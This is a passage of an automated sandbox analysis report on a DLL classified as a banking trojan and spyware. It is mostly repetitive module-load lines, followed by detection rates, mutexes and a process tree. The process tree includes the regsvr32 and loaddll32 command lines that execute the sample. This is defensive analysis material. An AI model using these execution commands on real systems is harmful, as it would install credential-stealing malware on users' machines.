Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@53/156@14/6

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04FA56A2 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

1_2_04FA56A2

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{0230B639-3F09-11EB-90E5-ECF4BB2D2496}.dat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4540
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{108A7729-2F56-C20D-3944-D3167DB8B7AA}
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3810B7D7-3716-2AFE-81EC-5BFE45E0BF12}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{2C8DF39C-9BA6-3E2B-8520-FF528954A3A6}

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF739EFE0EB6EEE638.TMP

Jump to behavior

Source: 5fd885c499439tar.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: 5fd885c499439tar.dll	Virustotal: Detection: 18%
Source: 5fd885c499439tar.dll	ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\5fd885c499439tar.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5fd885c499439tar.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:82952 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:82966 /prefetch:2
